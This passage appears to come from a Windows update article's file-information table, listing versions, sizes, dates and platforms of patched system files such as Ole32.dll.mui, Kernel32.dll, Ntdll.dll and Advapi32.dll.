applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,992| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 11:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 23,040| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Jan-2007| 03:30| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,064| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 11:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 20:38| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 12:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,528| 14-Apr-2017| 21:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 27-Nov-2006| 21:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,968| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 12:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,064| 14-Apr-2017| 21:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 16,384| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 16-Jan-2007| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,528| 14-Apr-2017| 21:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 23,552| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 11:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 13,824| 14-Apr-2017| 21:38| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 07-Nov-2006| 03:51| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 12,800| 14-Apr-2017| 21:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 21-Nov-2006| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 13:10| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,016| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Dec-2006| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,528| 14-Apr-2017| 21:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Nov-2006| 23:06| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,016| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 18-Jan-2007| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,016| 14-Apr-2017| 21:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 09-Nov-2006| 03:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 21-Nov-2006| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,968| 14-Apr-2017| 21:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Jan-2007| 03:35| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,456| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Nov-2006| 23:10| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:41| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 08-Nov-2006| 07:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:52| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 16,896| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,992| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,040| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 15:44| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 15:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:58| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 16,384| 07-Apr-2017| 16:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,552| 07-Apr-2017| 17:04| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 13,824| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 12,800| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 16:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 16:58| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,456| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:55| Not applicable| Not applicable \nComcat.dll| 6.0.6000.16386| 8,704| 02-Nov-2006| 11:16| x64| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:20| x64| Not applicable \nComcat.dll| 6.0.6002.24089| 8,704| 07-Apr-2017| 15:42| x64| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:55| x64| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 86,016| 12-Aug-2016| 19:07| x64| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 86,016| 07-Apr-2017| 15:42| x64| Not applicable \nKernel32.dll| 6.0.6002.19623| 1,212,928| 18-Mar-2016| 18:14| x64| Not applicable \nKernel32.dll| 6.0.6002.24089| 1,214,976| 07-Apr-2017| 15:43| x64| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,589,168| 21-Mar-2016| 23:00| x64| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,583,512| 11-Apr-2017| 04:07| x64| Not applicable \nOleaut32.dll| 6.0.6002.19773| 861,696| 14-Apr-2017| 20:38| x64| Not applicable \nOleaut32.dll| 6.0.6002.24089| 862,208| 07-Apr-2017| 15:43| x64| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 4,693,736| 06-Apr-2017| 16:21| x64| Not applicable \nNtoskrnl.exe| 6.0.6002.24089| 4,665,064| 07-Apr-2017| 15:50| x64| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 1,304,576| 06-Feb-2016| 02:01| x64| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 1,308,160| 07-Apr-2017| 15:44| x64| Not applicable \nSmss.exe| 6.0.6002.19598| 75,264| 06-Feb-2016| 00:48| x64| Not applicable \nSmss.exe| 6.0.6002.24089| 75,776| 07-Apr-2017| 14:43| x64| Not applicable \nNtvdm64.dll| 6.0.6002.19598| 16,896| 06-Feb-2016| 02:01| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.19598| 234,496| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.19598| 17,408| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.19598| 301,568| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 16,896| 07-Apr-2017| 15:43| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.24089| 234,496| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.24089| 17,408| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.24089| 301,568| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 861,696| 18-Mar-2016| 17:10| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 862,720| 07-Apr-2017| 15:25| x86| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,171,488| 21-Mar-2016| 23:00| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,167,880| 11-Apr-2017| 04:07| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 679,424| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 678,912| 07-Apr-2017| 15:25| x86| Not applicable \nAcwow64.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 02:11| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.19598| 7,680| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 14,336| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.19598| 2,560| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.19598| 5,120| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAcwow64.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.24089| 7,680| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 14,336| 07-Apr-2017| 15:24| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.24089| 2,560| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.24089| 5,120| 07-Apr-2017| 15:25| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 401,408| 07-Apr-2017| 16:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:46| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 16:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:42| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:45| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:47| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:51| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Jan-2007| 19:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 27-Nov-2006| 21:37| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 16-Jan-2007| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 18-Jan-2007| 03:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 09-Nov-2006| 03:58| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 